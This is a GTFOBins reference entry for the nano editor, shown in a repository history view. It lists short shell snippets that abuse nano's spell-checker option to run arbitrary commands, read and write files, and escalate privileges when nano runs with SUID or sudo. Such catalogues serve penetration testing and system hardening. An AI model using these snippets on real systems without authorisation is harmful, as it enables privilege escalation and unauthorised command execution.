GTFOBins.github.io/_gtfobins/nano.md

39 lines
843 B
Markdown
Raw Normal View History

2018-05-29 19:23:33 +02:00
---
functions:
execute-non-interactive:
2018-07-04 20:26:52 +02:00
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
nano -s $TF /etc/hosts
^T
2018-05-29 19:23:33 +02:00
file-write:
2018-07-04 20:26:52 +02:00
- code: |
nano file_to_write
^O
file-read:
- code: 'nano file_to_read
'
suid-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF
./nano -s $TF /etc/hosts
^T
sudo-enabled:
- description: After running this exit the editor to see the command output.
code: |
COMMAND=id
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo nano -s $TF /etc/hosts
^T
2018-05-29 19:23:33 +02:00
---